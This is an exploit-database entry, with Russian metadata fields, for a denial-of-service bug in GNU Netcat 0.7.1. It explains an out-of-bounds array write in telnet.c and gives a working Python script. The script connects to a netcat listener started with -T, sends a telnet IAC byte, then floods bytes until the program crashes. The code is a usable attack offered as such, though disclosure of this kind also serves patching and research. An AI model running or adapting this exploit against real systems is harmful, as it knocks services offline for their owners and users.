Exploit NetCat 0.7.1 - Denial of Service

[Exploiter]

EDB-ID

40866

Проверка EDB

1. Пройдено

Автор

N30M1ND

Тип уязвимости

DOS

Платформа

LINUX

CVE

N/A

Дата публикации

2016-12-05

NetCat 0.7.1 - Denial of Service

#/usr/bin/python
#-*- Coding: utf-8 -*-

### GNU Netcat 0.7.1 - Out of bounds array write (Access Violation) by n30m1nd ### 

# Date: 2016-11-19
# Exploit Author: n30m1nd
# Vendor Homepage: http://netcat.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download
# Version: 0.7.1
# Tested on: Debian 3.16.36-1+deb8u2 (2016-10-19) x86_64 GNU/Linux

# Credits
# =======
# Props to Giovanni and Armando creators of this useful piece of software, thank you guys!
# Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better. See you at AWE!

# How to
# ======
# * Get a distribution that ships with gnu netcat or Compile netcat from sources:
#       * # Download
#       * tar -xzf netcat-0.7.1.tar.gz
#       * cd netcat-0.7.1/
#       * ./configure
#       * make
#       * # Netcat will be deployed in src/netcat
#
# * Set netcat to listen like the following:
#   * ./netcat -nlvp 12347 -T
# * Just run this script on a different terminal
#

# Why?
# ====
# When the Telnet Negotiation is activated (-T option), Netcat parses the incoming packets looking for Telnet Control Codes
# by running them through buggy switch/case code. 
# Aforementioned code fails to safely check for array boundaries resulting in an array out of bounds write.

# Vulnerable code
# ===============
# telnet.c
# ...
# 76   static unsigned char getrq[4];
# 77   static int l = 0;
# 78   unsigned char putrq[4], *buf = ncsock->recvq.pos;
# ...
# 88   /* loop all chars of the string */
# 89   for (i = 0; i < ref_size; i++) {
# 90     /* if we found IAC char OR we are fetching a IAC code string process it */
# 91     if ((buf[i] != TELNET_IAC) && (l == 0))
# ...
#100     getrq[l++] = buf[i]; // BANG!
# 99     /* copy the char in the IAC-code-building buffer */
# ...
# 76   static unsigned char getrq[4];
# 77   static int l = 0;
# 78   unsigned char putrq[4], *buf = ncsock->recvq.pos;

# Exploit code
# ============

import socket

RHOST = "127.0.0.1"
RPORT = 12347

print("[+] Connecting to %s:%d") % (RHOST, RPORT)
s = socket.create_connection((RHOST, RPORT))
s.send("\xFF") # Telnet control character
print("[+] Telnet control character sent")
print("[i] Starting")
try:
	i = 0
	while True: # Loop until it crashes
		i += 1
		s.send("\x30")
except:
	print("[+] GNU Netcat crashed on iteration: %d") % (i)